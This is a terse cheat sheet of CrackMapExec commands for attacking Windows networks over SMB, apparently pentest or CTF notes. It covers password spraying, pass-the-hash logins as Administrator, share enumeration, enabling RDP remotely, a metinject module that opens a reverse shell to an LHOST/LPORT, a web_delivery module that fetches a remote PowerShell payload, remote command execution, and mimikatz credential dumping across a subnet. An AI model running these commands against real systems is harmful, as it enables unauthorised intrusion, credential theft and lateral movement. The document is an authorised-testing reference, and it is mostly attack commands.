### Check the password policy

```bash
cme smb ip --pass-pol
# Check the account lockout threshold -> the account lockout value. If it is 0, accounts never lock out, so password spraying is possible.
```

### test

```
crackmapexec smb 10.10.93.195 -u bitbucket -p littleredbucket --continue-on-success
```

###

```bash
cme smb -L
cme smb -M name_module -o VAR=DATA
cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
cme mimikatz --server http --server-port 80
```

### BloodHound integration

```ini
# ~/.cme/cme.conf
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = user
bh_pass = pass
```